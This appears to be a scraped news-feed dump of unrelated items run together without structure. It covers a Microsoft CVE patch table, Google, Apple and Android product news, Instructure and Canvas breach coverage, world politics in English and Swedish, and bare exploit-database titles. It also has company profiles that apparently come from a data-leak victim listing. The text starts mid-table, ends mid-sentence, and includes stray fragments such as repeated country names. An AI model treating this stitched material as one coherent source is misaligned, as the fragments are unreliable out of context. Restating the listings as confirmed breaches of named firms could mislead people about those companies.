VulnerabilityExploitation Less LikelyNo7.8CVE-2026-32209Windows Filtering Platform (WFP) Security Feature Bypass VulnerabilityExploitation UnlikelyNo4.4CVE-2026-35421Windows GDI Remote Code Execution VulnerabilityExploitation UnlikelyNo7.8CVE-2026-40403Windows Graphics Component Remote Code Execution VulnerabilityExploitation Less LikelyNo8.8CVE-2026-40402Windows Hyper-V Elevation of Privilege VulnerabilityExploitation Less LikelyNo9.3CVE-2026-33841Windows Kernel Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-35420Windows Kernel Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40369Windows Kernel Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-34332Windows Kernel-Mode Driver Remote Code Execution VulnerabilityExploitation UnlikelyNo8.0CVE-2026-34339Windows Lightweight Directory Access Protocol (LDAP) Denial of Service VulnerabilityExploitation Less LikelyNo5.5CVE-2026-34341Windows Link-Layer Discovery Protocol (LLDP) Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-33838Windows Message Queuing (MSMQ) Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-32161Windows Native WiFi Miniport Driver Remote Code Execution VulnerabilityExploitation Less LikelyNo7.5CVE-2026-41089Windows Netlogon Remote Code Execution VulnerabilityExploitation Less LikelyNo9.8CVE-2026-34342Windows Print Spooler Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-34340Windows Projected File System Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-40398Windows Remote Desktop Services Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-21530Windows Rich Text Edit Elevation of Privilege VulnerabilityExploitation Less LikelyNo6.7CVE-2026-32170Windows Rich Text Edit Elevation of Privilege VulnerabilityExploitation Less LikelyNo6.7CVE-2026-40410Windows SMB Client Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-35415Windows Storage Spaces Controller Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34350Windows Storport Miniport Driver Denial of Service VulnerabilityExploitation UnlikelyNo6.5CVE-2026-40405Windows TCP/IP Denial of Service VulnerabilityExploitation Less LikelyNo7.5CVE-2026-40414Windows TCP/IP Denial of Service VulnerabilityExploitation UnlikelyNo7.4CVE-2026-40401Windows TCP/IP Denial of Service VulnerabilityExploitation UnlikelyNo7.1CVE-2026-40413Windows TCP/IP Denial of Service VulnerabilityExploitation Less LikelyNo7.4CVE-2026-35422Windows TCP/IP Driver Security Feature Bypass VulnerabilityExploitation UnlikelyNo6.5CVE-2026-34351Windows TCP/IP Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40399Windows TCP/IP Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34334Windows TCP/IP Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-40406Windows TCP/IP Information Disclosure VulnerabilityExploitation Less LikelyNo7.5CVE-2026-33837Windows TCP/IP Local Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-40415Windows TCP/IP Remote Code Execution VulnerabilityExploitation UnlikelyNo8.1CVE-2026-42825Windows Telephony Service Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.0CVE-2026-34338Windows Telephony Service Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40382Windows Telephony Service Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40380Windows Volume Manager Extension Driver Remote Code Execution VulnerabilityExploitation Less LikelyNo6.2CVE-2026-40408Windows WAN ARP Driver Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34333Windows Win32k Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34347Windows Win32k Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-35417Windows Win32k Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8Critical RCEs and EoPsCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-33109Azure Managed Instance for Apache Cassandra Remote Code Execution VulnerabilityN/ANo9.9CVE-2026-33844Azure Managed Instance for Apache Cassandra Remote Code Execution VulnerabilityN/ANo9.0CVE-2026-42823Azure Logic Apps Elevation of Privilege VulnerabilityExploitation Less LikelyNo9.9CVE-2026-42898Microsoft Dynamics 365 On-Premises Remote Code Execution VulnerabilityExploitation UnlikelyNo9.9CVE-2026-42833Microsoft Dynamics 365 On-Premises Remote Code Execution VulnerabilityExploitation Less LikelyNo9.1CVE-2026-41103Microsoft SSO Plugin for Jira & Confluence Elevation of Privilege VulnerabilityExploitation More LikelyNo9.1CVE-2026-41096Windows DNS Client Remote Code Execution VulnerabilityExploitation UnlikelyNo9.8CVE-2026-40402Windows Hyper-V Elevation of Privilege VulnerabilityExploitation Less LikelyNo9.3CVE-2026-41089Windows Netlogon Remote Code Execution VulnerabilityExploitation Less LikelyNo9.8

The man smashed into a car and stole luggage containing hard drives with the singer's tracks.

Google today announced a new series of Googlebook laptops that will be built with Gemini at the core. Googlebooks will run software built on a foundation that combines Android and ChromeOS. Google says the new laptops are designed for Gemini Intelligence for a more personalized and proactive experience. Instead of a cursor, Googlebooks have a Magic Pointer that users can wiggle to activate Gemini. Gemini can then provide contextual suggestions and answers based on whatever the user is pointing to on the screen. Pointing at a date in an email sets up a meeting, and selecting two images allows them to be visualized together. There are ask, compare, and combine tools available with the Magic Pointer. Create My Widget, a new Android feature, is coming to Googlebooks. Users can create custom widgets with a Gemini prompt. Gemini is able to search the internet and connect with Google apps like Gmail and Calendar to create a personalized dashboard that can be used for widget creation. Since Googlebooks will run Android, it will be easier to switch between a Googlebook and an Android smartphone. Apps from a connected Android smartphone will be available on the Googlebook, with a feature set similar to Apple's iPhone Mirroring. Quick Access will let users view, search, or insert files from a smartphone on the laptop, with no transfer needed. Google says it is working with Acer, ASUS, Dell, HP, and Lenovo to make the first Googlebooks. The machines will be built with "premium craftsmanship and materials, coming in a variety of shapes and sizes." Each one will have a "glowbar" on the lid, making it clear that it's a Googlebook. Google has not given insight into Googlebook pricing, but with the specific "premium" build language, they could be priced above the low-cost MacBook Neo that Apple recently came out with. It's also possible that Googlebooks will have MacBook Neo-level pricing to better compete with Apple's laptop in on pricing and build quality. The first Googlebooks are set to launch this fall.Tags: Android, GoogleThis article, "Google Unveils Googlebook, a New AI Laptop Built Around Gemini" first appeared on MacRumors.comDiscuss this article in our forums

Voister har sedan 2016 bevakat Sveriges it-utveckling. Efter tio år tar vi nu sikte på nästa kapitel, som börjar med ett nytt namn: CIO Analytics.

With an aging population and large percentage of adults who grew up as only children, families are finding themselves at a loss for how to choose adequate nursing homes. Enter senior care managers.

Customers with addresses in the neighborhood, known for its livestreaming community, reported being unable to order items from various luxury brands online for several days.

Ninja Forms Uploads - Unauthenticated PHP File Upload

glances 4.5.2 - command injection

coreruleset 4.21.0 - Firewall Bypass

Flowise < 3.0.5 - Missing Authentication for Critical Function

The good news: no 0-days. The bad news: busy week ahead for Microsoft admins

Popular Mac menu bar management app Bartender received an upgrade today with the launch of Bartender Pro. Bartender Pro adds a new Top Shelf feature to the Mac's notch, with access to multiple utility tools. Top Shelf can be used for clipboard access, storing files, controlling audio, and sending content over AirDrop. It supports widgets for calendar, weather, and music apps like Apple Music or Spotify. There's a full Now Playing music controller, and options to get alerts when scheduled events are coming up. Top Shelf expands the size of the notch, turning it into something like the iPhone's Dynamic Island. Users can drag files over to the notch to store them or send them via AirDrop, and access a clipboard. The clipboard can be set to automatically capture content that's copied, with options to ignore passwords. There are customizable duration options for both the clipboard and file storage. Widgets in Top Shelf are customizable, and it supports a Live Activity-like tracking feature for AI agents like Codex and Claude Code. Info like volume, display brightness, and battery level is also available. Top Shelf works alongside Bartender, and all of the standard Bartender features are available with Bartender Pro. When not in use, Top Shelf is tucked away much like Bartender, and it disappears when Bartender is expanded. While it is a tool designed around the notch, it also works on Macs that don't have one. Bartender Pro is optional, and users who don't need the extra features can stick with Bartender 6. Bartender Pro is priced at $15 per year. The subscription includes Bartender 6, all future upgrades for the subscription duration, and the Bartender Pro suite. Bartender 6 is still available for a one-time $20 purchase, and the $80 Mega Supporter option continues to offer lifetime Bartender access with Bartender Pro included. Bartender Pro and Bartender 6 are available from the Bartender website.Tag: BartenderThis article, "Bartender Pro Brings Widgets, Clipboard, and File Storage to the MacBook Notch" first appeared on MacRumors.comDiscuss this article in our forums

The United States announced on Tuesday that it would send a delegation to the second Asia-Pacific Economic Cooperation (Apec) 2026 Senior Officials’ Meeting (SOM2) and related meetings in China this month, just hours after US President Donald Trump departed for Beijing ahead of a high-stakes summit with Chinese counterpart Xi Jinping. The US delegation will head to Shanghai and Suzhou from May 11 to 24 to “continue advancing ‘America first’ foreign, trade, and investment policies,” according to...

Syrenen står i blom och Eurovision song contest är tillbaka i Centraleuropa. Sverige är vidare till final. Superfavoriten Finland likaså, men bara ett bidrag kan gå hela vägen – och i kväll blev det tydligt vilket det är.

Article URL: https://www.bbc.com/culture/article/20260511-kraftwerks-radical-1976-track-radioactivity-became-an-anti-nuclear-anthem Comments URL: https://news.ycombinator.com/item?id=48115823 Points: 220 # Comments: 190

Article URL: https://www.savethearchive.com/newsleaders/ Comments URL: https://news.ycombinator.com/item?id=48115807 Points: 389 # Comments: 108

The U.S. House Committee on Homeland Security is calling on Instructure executives to testify about two cyberattacks by the ShinyHunters extortion group that targeted the company's Canvas platform, allowing threat actors to steal student data and disrupt schools during final exams. [...]

'What the hell is going on? It's just draining my money'

South Korea's presidential policy chief is calling for a "citizen dividend" that would return some AI-driven profits and tax revenue to the public. The Straits Times. From the report: Presidential policy chief Kim Yong-beom said in a Facebook post that a portion of the profits and tax revenue derived from the artificial intelligence boom "should be structurally returned to all citizens." That is because, Mr Kim argued, the economic gains from AI are based at least partly on industrial infrastructure built by the country over five decades. Mr Kim's comments come after tens of thousands of people gathered outside Samsung's main chip hub in April to demand employees get a greater share of AI profits. The company's labour union wants 15 per cent of operating profit handed to chip-division employees. The union has threatened an 18-day strike starting May 21. Workers have pointed to rising payouts at SK Hynix, which in 2025 agreed to allocate 10 per cent of its annual operating profit to a performance bonus pool, as evidence they deserve more pay. "Excess profits in the AI era are, by nature, concentrated," Mr Kim wrote. Memory companies, core engineers and asset holders are highly likely to receive substantial benefits, while much of the middle class may experience only indirect effects. Read more of this story at Slashdot.

For those making use of OpenZFS on Linux or FreeBSD, OpenZFS 2.4.2 is out today as the newest stable release of this ZFS file-system implementation...

Article URL: https://arstechnica.com/tech-policy/2026/05/drop-database-what-not-to-do-after-losing-an-it-job/ Comments URL: https://news.ycombinator.com/item?id=48115438 Points: 68 # Comments: 23

N/A

Founded in 1846, Porter Wright is a full-service law firm offering legal helo for the community specia…

They offered $100,000 to keep the data from being published. Founded in 1962 and headquartered in Phil…

Air India faces a leadership vacuum and mounting financial losses as it struggles to recover from the crash.

Beijing is arguably the most powerful competitor the US has confronted in its history, one analyst says.

Affected factories back up and running, we're told

Instructure, the company behind the widely used Canvas learning platform, says it reached an agreement with the hackers who stole 3.5 terabytes of student and university data. The company says it received "digital confirmation" that the information was destroyed and that affected schools and students would not be extorted. The BBC reports: Paying cyber criminals goes against the advice of law enforcement agencies around the world, as it can fuel further attacks and offers no guarantee the data has been deleted. In previous cases, criminals have accepted ransom payments but lied about destroying stolen data, instead keeping it for resale. For example, when the notorious LockBit ransomware group was hacked by the National Crime Agency, police found stolen data had not been deleted even after payments had been made. Instructure said in a statement on its website that protecting students' and education staff data was its primary motivation. "While there is never complete certainty when dealing with cyber criminals, we believe it was important to take every step within our control to give customers additional peace of mind, to the extent possible," the company said. Instructure did not set out the terms of the agreement but said that it meant that: - the data was returned to the company - it received "digital confirmation of data destruction" - it had been informed that no Instructure customers would be extorted as a result of the incident - the agreement covers all affected customers, with no need for individuals to engage with the hackers Read more of this story at Slashdot.

The plan aims to speed up AI compute deployment while compensating residents.

Article URL: https://github.com/FULU-Foundation/OrcaSlicer-bambulab Comments URL: https://news.ycombinator.com/item?id=48115127 Points: 619 # Comments: 279

N/A

Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code. That reality is on full display this month with some of the more widely-used software makers -- including Apple, Google, Microsoft, Mozilla and Oracle -- fixing near record volumes of security bugs, and/or quickening the tempo of their patch releases.

Against the backdrop of a shifting diplomatic landscape, US President Donald Trump is set to arrive in Beijing this week for a high-stakes summit. While Washington frames the visit, delayed by the war in Iran, as a pivotal effort to rebalance ties, the bravado of maximum pressure masks a deepening domestic vulnerability. Trump’s arrival comes at a critical juncture; his administration faces multiple crises. The looming 2026 midterms have intensified pressure from a restless agricultural...

Makary reportedly spent his year bucking Trump admin and making industry enemies.

FreeBSD 15.0 had aimed to provide a KDE desktop install option from its text-based OS installer to make for a more compelling FreeBSD out-of-the-box desktop experience. That was then delayed to FreeBSD 15.1 but that didn't end up materializing. Now the KDE desktop install option is diverted to FreeBSD 15.2...

If you're not a fan of having AI baked into your OS, look elsewhere

It's the first time in two years with no zero-days. But with 137 flaws to patch, including nine critical ones, admins still have plenty of work to do.

An anonymous reader quotes a report from the Financial Times (via Ars Technica): Amazon employees are using an internal AI tool to automate non-essential tasks in a bid to show managers they are using the technology more frequently. The Seattle-based group has started to widely deploy its in-house "MeshClaw" product in recent weeks, allowing employees to create AI agents that can connect to workplace software and carry out tasks on a user's behalf, according to three people familiar with the matter. Some employees said colleagues were using the software to automate additional, unnecessary AI activity to increase their consumption of tokens -- units of data processed by models. They said the move reflected pressure to adopt the technology after Amazon introduced targets for more than 80 percent of developers to use AI each week, and earlier this year began tracking AI token consumption on internal leader boards. "There is just so much pressure to use these tools," one Amazon employee told the FT. "Some people are just using MeshClaw to maximize their token usage." Amazon has told employees that the AI token statistics would not be used in performance evaluations. But several staff members said they believed managers were monitoring the data. "Managers are looking at it," said another current employee. "When they track usage it creates perverse incentives and some people are very competitive about it." Read more of this story at Slashdot.

RSL Media expands machine-readable licensing rules to cover AI use of identities and creative works

Google today said it is introducing updated file sharing features that will make it easier for Android users to send files to iPhone users. Quick Share is already compatible with Apple's AirDrop feature on select Android devices, but Google says the feature will expand to Samsung, OPPO, OnePlus, Vivo, Xiaomi, and HONOR devices in 2026. On Android devices that are not compatible with AirDrop, Quick Share can be used to generate a QR code that can instantly share content with iOS devices via the cloud. The QR code sharing feature is rolling out to all Android devices starting today, and will be fully available within the next month. Google says it also plans to make Quick Share available in apps like WhatsApp in the near future. Google says that it also worked with Apple to make it easier to switch from an iPhone to an Android device, capabilities the two companies had to implement under Europe's Digital Markets Act. While Apple implemented the feature in iOS 26.3, Google says it will be coming to Samsung Galaxy and Google Pixel devices in 2026. The transfer process will allow eSIM, passwords, photos, messages, apps, contacts, and Home Screen layout to migrate wirelessly from an iPhone to an Android device. Google has also implemented similar tools for simplifying switching between an Android device and an iPhone.Tags: Android, GoogleThis article, "Google Makes It Easier to Share Files Between Android and iPhone" first appeared on MacRumors.comDiscuss this article in our forums

US Defence Secretary Pete Hegseth has become the first American defence chief in decades to accompany a sitting president on a state visit to China, in a rare departure from long-established diplomatic practice. Hegseth boarded Air Force One bound for Beijing alongside US President Donald Trump on Tuesday afternoon, according to the White House. Trump is set to hold highly anticipated bilateral talks with Chinese President Xi Jinping on Thursday and Friday. A South China Morning Post tally shows...

Article URL: https://github.com/Genymobile/scrcpy/releases/tag/v4.0 Comments URL: https://news.ycombinator.com/item?id=48114356 Points: 335 # Comments: 50

Apple is introducing an overhauled version of Siri in iOS 27, evolving the personal assistant into a more capable chatbot and AI agent able to compete with ChatGPT, Claude, and Gemini. With ‌Siri‌'s transition, Apple will be making multiple Siri-related design changes in ‌iOS 27‌, according to a new report from Bloomberg. ‌Siri‌ will largely live in the Dynamic Island in ‌iOS 27‌, but there will also be a dedicated ‌Siri‌ app for the first time. When ‌Siri‌ is activated with the ‌Siri‌ wake word or through the iPhone's side button, a pill-shaped animation will be displayed in the ‌Dynamic Island‌. When ‌Siri‌ is asked a question or given a task, there will be a transparent results card. Swiping on it will bring up a conversation mode that looks similar to an iMessage chat, and it will incorporate small cards for the weather, notes, upcoming appointments, and other information that's relevant to queries. Apple is also designing a full ‌Siri‌ app for ‌Siri‌ conversations. It will allow users to look back at prior chats, and begin new ‌Siri‌ chats. There is a grid of rectangles with summaries of past conversations that users can tap into, a search bar, and a "+" button for starting a new conversation. The app will support uploading images and documents, and users will be able to type to ‌Siri‌ or use voice input. Swiping down from the top center of the display in any app will activate a system-wide search interface, with a "Search or Ask" bar in the ‌Dynamic Island‌ for typing or speaking questions. Search or Ask is similar to Spotlight Search, but Bloomberg suggests it will display "more advanced results and additional data from within apps." ‌Siri‌ will be able to draw information from the web to provide detailed answers to the typical questions users ask chatbots. ‌Siri‌'s responses will include bullet points with information and large images. While ‌Siri‌ is the default for the search bar, pressing on it will let users select other chatbots to speak with, such as ChatGPT or Gemini. Apple plans to let users choose third-party AI services as the default for Apple Intelligence features like Writing Tools and Image Playground, expanding ‌Apple Intelligence‌ integration beyond ChatGPT. Apple plans to overhaul the ‌Image Playground‌ app. The interface for generating a new image has fewer controls and a "describe a change" option for editing images that are created. Previously created images are displayed in a grid with more rounded edges, and instead of a New Image button, there's a "+" button. Apple has also been testing new models that produce more lifelike images, so we could see new image generation capabilities in ‌iOS 27‌. Apple is also planning changes to the Camera app, Photos app, Wallet, and Shortcuts, plus there could be tweaks to Liquid Glass. More on what to expect from ‌iOS 27‌ can be found in our iOS 27 roundup.Related Roundup: iOS 27Tags: Bloomberg, Mark Gurman, SiriThis article, "iOS 27 Getting Major Siri Redesign With Chat Interface and Dedicated App" first appeared on MacRumors.comDiscuss this article in our forums

Apple plans to make the Camera app more customizable in iOS 27, reports Bloomberg. Users will be able to select the features they want to see in the Camera app, like flash, exposure, timer, depth of field, photo styles, and resolution. Camera controls, labeled as widgets, will be able to be placed at the top of the Camera interface in any order. Users will be able to select widgets from a transparent widget tray that comes up from the bottom of the app. Widgets will be organized into categories that include basic, manual, and settings. Apple plans to use the same default layout that's available now with quick tap buttons for flash, Live Photos, and Night Mode, but the customizable interface will be added as a new advanced layout that will appeal to professional users. Different modes like photo and video will have their own sets of widgets, as will a new Siri camera mode that Apple plans to add to the app. ‌Siri‌ mode will incorporate the Visual Intelligence features that are currently accessible through the Camera Control or Action buttons. Right now, users can tap into a view with all of the Camera controls from the top right of the app, but that view is moving to the right of the shutter button. Apple will also add new grid and level options. In the Weather app, there will be a new Conditions panel for switching between temperature, rain, and wind. It will be the same as the interface that's available when tapping into one of the weather modules in the current version of the app. Apple plans to add an updated start page to Safari, and it will have four tabs across the top for swapping between favorites, bookmarks, Reading List, and history. There are system-wide design changes coming as well, according to Bloomberg. The tab bar in apps like Apple Music, Podcasts, News, and Apple TV will be adjusted to combine search with the other navigation options. Apple separated search in many apps when introducing Liquid Glass, but it sounds like the company is going to revert to the prior unified design. When using the on-screen keyboard, there's a new animation that shows the keys sliding up from the bottom of the iPhone interface, plus Apple is adding redo and undo controls for fixing actions when customizing the Home Screen's icon and widget layouts. Apple is planning to preview ‌iOS 27‌ at the Worldwide Developers Conference that begins on June 8.Related Roundup: iOS 27Tags: Bloomberg, Mark GurmanThis article, "iOS 27 to Bring Customizable Camera App, Tweaks to Weather, Safari and Liquid Glass" first appeared on MacRumors.comDiscuss this article in our forums

You have an IT budget? Must be nice. I am tasked with upgrading 3 Dell PowerEdge R430 servers that run a specific electronics part placement line software. Back in 2018 we purchased this absolutely horrible software and I worked with a project manager there to spec out the hardware. I was told at that time that *ahem* "7,200 RPM SATA drives should be okay as long as they are 2TB capacity." To run a MSSQL database. I don't know everything, but I'm pretty sure 7,200 RPM SATA drives for a database is not going to fly. I opted for SSDs but was told they were too expensive at the time by our GMs. We ended up finding 10k SAS drives and called it a day because I knew I wasn't going to win and hoped it would be okay. Since then, the guys I work with that interface with their software have been pissing and moaning about how long it takes to do anything. That's fine and dandy, I just reply that the project manager who specced the shit out OK'd this stuff. What's really annoying now however is that we've had this company here to troubleshoot some issues and the techs are also complaining about how slow these servers are. When I bring up that we followed so and so's project guide from their company and his recommended specs they look at me like I have two heads. Another great part is that the database is nowhere near close to using 2TB of storage. So now I'm tasked with upgrading these 3 servers, at a time where it couldn't possibly be any worse. Just looking at high-endurance SSDs and seeing the cost... I can already hear the GMs saying no. In short, are there any brands offering deals on 2.5" SSDs with at least 3 DWPD? I am planning to put them into some R640 servers with a PERC H730p. Any advice would be killer. submitted by /u/R4LRetro [link] [comments]

The government hopes reforms will help young people enter the market, while critics say it will stifle supply.

United States

United States

United States

United States

United States

Canada

United States

The Information Commissioner's Office has fined South Staffordshire Water Plc and parent company South Staffordshire Plc £963,900 ($1.3 million) over a cyberattack that exposed the personal data of 663,887 customers and employees. [...]

Article URL: https://typesetinthefuture.com/2016/02/18/futuristic/ Comments URL: https://news.ycombinator.com/item?id=48113895 Points: 459 # Comments: 58

Beijing lashed out at Paraguay on Monday after President Santiago Pena wrapped up a four-day visit to Taiwan, branding Paraguayan leaders as willing “chess pieces” for independence forces on the self-ruled island that China claims as its own territory. Foreign ministry spokesman Guo Jiakun said China “firmly opposes and condemns” the trip and urged Asuncion to “change course at an early date” and recognise the one-China principle. “The wheels of history wait for no one. Rejecting the one-China...

Lebanon's health ministry says the paramedics were carrying out a rescue mission in Nabatieh in response to an earlier attack that killed one person.

Google is teasing a new line of "Googlebook" laptops for this fall, powered by a new Android-and-ChromeOS-derived operating system that will run Chrome, Android apps, phone-connected apps and files, and deeply integrated Gemini features. The company says Chromebooks will continue "after the launch of Googlebook" and "...all Chromebooks will continue to receive support through their device's existing date commitment." The Verge reports: "We'll have more to share on the exact OS branding later this year," Peter Du of Google's global communications team tells The Verge. [...] Googlebooks will have a Magic Pointer feature that offers contextual suggestions whenever you shake your cursor and point it at something on the screen. Google's examples include setting up a meeting by pointing at a date in an email or selecting images of furniture and a living space to visualize them together. Beyond your mouse pointer, Googlebooks will also feature the custom AI-created widgets that Google is also debuting today for Android phones and Wear OS smartwatches. I don't know what kind of horrors people will be able to make into widgets, but Google gives the example of making one to organize your flights, hotel information, restaurant reservations, and another for creating a countdown timer for an upcoming family reunion. (It's always flights, hotels, and restaurants, isn't it?) While there are many outstanding questions to be answered about Googlebooks, the biggest and most obvious ones are what will these laptops look like, what chips will be in them, and what will they cost? We've got none of that so far. Google only has some initial renders of a mysterious Googlebook and the promise that it's working with Acer, Asus, Dell, HP, and Lenovo to make the first models. There are no model names. No specs. Nada. Google isn't even saying if the laptop in its renders is made by a partner or a tease of some first-party Pixel-like Googlebook to come or is just a cool mockup. The one distinct hardware feature shown, the bar of glowing Google-colored light, will be a signature of all Googlebooks. (Sure, bring on the RGB. Why not?) Read more of this story at Slashdot.

IT teams often struggle to quickly coordinate responses across disparate systems during network incidents. This upcoming webinar explores how automation and AI-assisted workflows can reduce response times and help prevent outages. [...]

China’s foreign minister Wang Yi on Tuesday urged Pakistan to ramp up mediation efforts in the Iran crisis, as the war threatens to overshadow US President Donald Trump’s visit to Beijing. In a call with his Pakistani counterpart Ishaq Dar, Wang lauded Pakistan’s efforts in facilitating negotiations between Washington and Tehran and helping to extend the ceasefire. But he also called for Pakistan to “step up its mediation efforts to contribute to … the opening of the Strait of Hormuz and the...

Signal has introduced new in-app confirmations and warning messages as additional safeguards against phishing and social engineering attempts that could lead to various forms of fraud. [...]

Den globala hackerattacken som drabbat flera svenska universitet har stoppats. Hackergruppen hotade att läcka enorma mängder data. Men nu har det angripna företaget enligt uppgift till DN ingått i en överenskommelse med hackergruppen. – Om det skulle vara så att man har satt sig i en förhandlingssituation och betalat en lösesumma till en kriminell aktör, då vill jag peka på att det sällan leder till något gott, säger Eric Leijonram, generaldirektör på IMY.

fdpme.com zoominfo.com/c/focus-design-partners/368873259 Focus Design Partners (fdpme.com) is a Grade-A international firm with nearly 50 years of excellence in architecture, engineering, and project management, delivering iconic projects like Qatar's Al Jannoub Stadium and Lusail Circuit. With offices across 6+ countries, they combine global expertise with strategic partnerships and a people-first culture certified by Great Place To Work®. Their integrated, sustainable design solutions span sports, healthcare, commercial, and infrastructure sectors — all delivered with full accountability and innovation

shajarpaksecurities.com Shajarpak Securities is a trusted SECP-licensed brokerage and part of the Shajarpak Group, empowering clients with secure online trading on the Pakistan Stock Exchange. Their seasoned equity team brings 60+ years of combined experience, delivering timely market insights and best-in-class execution with strict compliance and ethical standards. With a robust Oracle®-based platform, mobile apps, and dedicated support for NRPs and institutional investors, they make intelligent investing accessible anytime, anywhere

qnbn.qa zoominfo.com/c/qatar-national-broadband-network-qnbn/1121927707 Qatar National Broadband Network is a government-owned leader in passive fiber infrastructure, established in 2011 to power Qatar's digital transformation and National Vision 2030. With nationwide fiber-optic coverage, QNBN enables ultra-fast, secure connectivity for homes, businesses, and government through open access for all licensed service providers. Strategic partnerships with Microsoft and Carnegie Mellon Qatar underscore its commitment to innovation, AI readiness, and cyber-resilient infrastructure — all delivered with sustainability and future-ready excellence

electroban.com.py zoominfo.com/c/electroban-sae/372861276 Electroban is a leading 100% Paraguayan retail company founded in 2007, specializing in home appliances, electronics, furniture, and motorcycles. With nationwide coverage through numerous branches and home delivery, they serve over 100,000 customers with a certified e-commerce platform and reliable after-sales support. Backed by a team of 700+ employees and values like honesty and continuous learning, Electroban is expanding toward 70 stores to bring innovation and quality of life to families across Paraguay

orientaldiamond.jp Oriental Diamond Inc. is a pioneering Japanese diamond enterprise established in 1966, specializing in the import, design, and manufacturing of fine diamond jewelry and loose stones. As the first company in Japan to earn the prestigious Sightholder qualification, they combine global sourcing with in-house craftsmanship to deliver conflict-free diamonds and elegant collections like Hoshi no Suna. With a heritage of excellence and a diversified portfolio spanning jewelry, bridal, and traditional kimono wholesale, they continue to innovate as a trusted market leader in Tokyo's luxury sector

setcar.com.tn zoominfo.com/c/setcar/507355731 SETCAR is Tunisia's pioneering private manufacturer of buses, coaches, and minibuses, with over 50 years of excellence since 1976. Partnering with global leaders like Volvo and Iveco, they produce up to 500 vehicles annually, serving public transport, tourism, and institutional clients across Africa and the Middle East. With a 300-strong expert team, advanced production facilities, and dedicated after-sales support, SETCAR delivers innovative, eco-friendly mobility solutions built for reliability and performance

valueexch.com Value Exchange International Inc. is a trailblazing retail technology leader with over 30 years of expertise, delivering comprehensive digital solutions across Asia, the UK, Australia, and New Zealand. Their 300+ professionals provide 24/7 Managed Operations, Systems Integration, and innovative retail hardware — from Electronic Shelf Labels to AI-powered inspection robots — powering 20,000+ daily POS transactions and HK$400+ billion in annual retail sales. With a customer-centric approach and cutting-edge technology, VEII empowers retailers to thrive through seamless digital transformation and operational excellence

dodsonandhorrell.com zoominfo.com/c/dodson--horrell-ltd/21104188 Dodson Horrell is a world-leading, family-run feed manufacturer established in 1939, specializing in premium nutrition for horses, poultry, and zoo animals. With over 80 years of expertise, their science-backed formulations and dedicated Nutritional Helpline empower owners to care for every animal as an individual. As exclusive feed partners to the British Equestrian Teams and a trusted name across global equestrian communities, they combine heritage, innovation, and unwavering quality

amstelsecurities.com zoominfo.com/c/amstel-securities-llp/353641962 Amstel Securities is a premier independent brokerage firm founded in 1989, connecting Asian and global markets with 35+ years of expertise in fixed income, equities, and derivatives. As a trusted agency and matched-principal broker, they specialize in Southeast Asian domestic currency bonds, high-yield credit, and G7 markets, serving institutional clients with unbiased execution and deep liquidity. Backed by strategic partnerships with BNY Mellon's Pershing for clearing and custody, they deliver secure, efficient solutions for wealth managers, family offices, and accredited investors worldwide

getece.com zoominfo.com/c/getece-co-ltd/353619915 GeTeCe is Thailand's trusted ingredients partner since 1978, specializing in premium chemicals, fragrances, flavours, and food ingredients for diverse manufacturing industries. With four decades of expertise, a state-of-the-art blending facility, and strategic global partnerships, they deliver tailored solutions backed by deep market insights and regulatory compliance. Their dedicated technical team and reliable supply chain empower clients to innovate confidently and stay ahead in competitive markets across Southeast Asia

Denton Calvary Academy is a K-12 University-Model school that focuses on fostering a love of learnin...

USA:s president Donald Trump har presenterat nästa steg efter den militära operationen i Venezuela. – Jag ska få ut alla politiska fångar ur Venezuela, säger han enligt Reuters.

Google today previewed Android 17, the next version of Android that it is bringing to smartphones and other devices. Android 17 includes multiple new AI features, and it comes about a month ahead of when Apple plans to unveil iOS 27 with new AI capabilities. Google is now calling the AI features on Android "Gemini Intelligence," branding similar to Apple Intelligence. Google said it is transitioning Android from an operating system to an intelligence system, with proactive, on-device agentic AI. Expanded Gemini integration - Gemini will be able to do more tasks autonomously, from booking classes to making purchases. Visual context - Gemini will be able to draw context from what's on the screen, which is something that Apple is also bringing to iPhones soon. Google says Android users will be able to do things like bring up a long shopping list in the notes app, long press on the power button over the list, and have Gemini build a shopping cart with all of the items for delivery. Smarter web browsing - Gemini in Chrome will let users research, summarize, and compare content on the web. Chrome auto browse will also be able to do more tasks like reserving a parking spot or booking an appointment. Autofill - Android can fill more text fields in apps with Gemini's Personal Intelligence that draws information from apps like Gmail and Google Photos. Rambler - Rambler is an AI voice dictation feature that cuts out filler words like um, ah, and like. Rambler will take the important parts from voice dictation, and create a concise message. It works with multiple languages at once. Create My Widget - Create My Widget lets Android users build custom widgets by describing what they want in natural language. Widgets can do things like provide the weather, offer recipes, count down to events, provide the time, display stock info, and more. There are other changes coming to Android 17 too. 3D Emoji - Google is adopting Noto 3D, a new 3D emoji collection. Android Auto - Android Auto is getting expanded Gemini integration and a refreshed look with support for the Material 3 Expressive design. Google is adding customizable widgets, edge-to-edge Google Maps, and Immersive Navigation, which includes 3D views highlighting important navigation details. When parked, cars will support YouTube playback. Gemini Intelligence is coming to Android Auto cars, and it will be able to do things like respond to texts automatically or order food for pickup. Google built-in - Cars with Google built-in 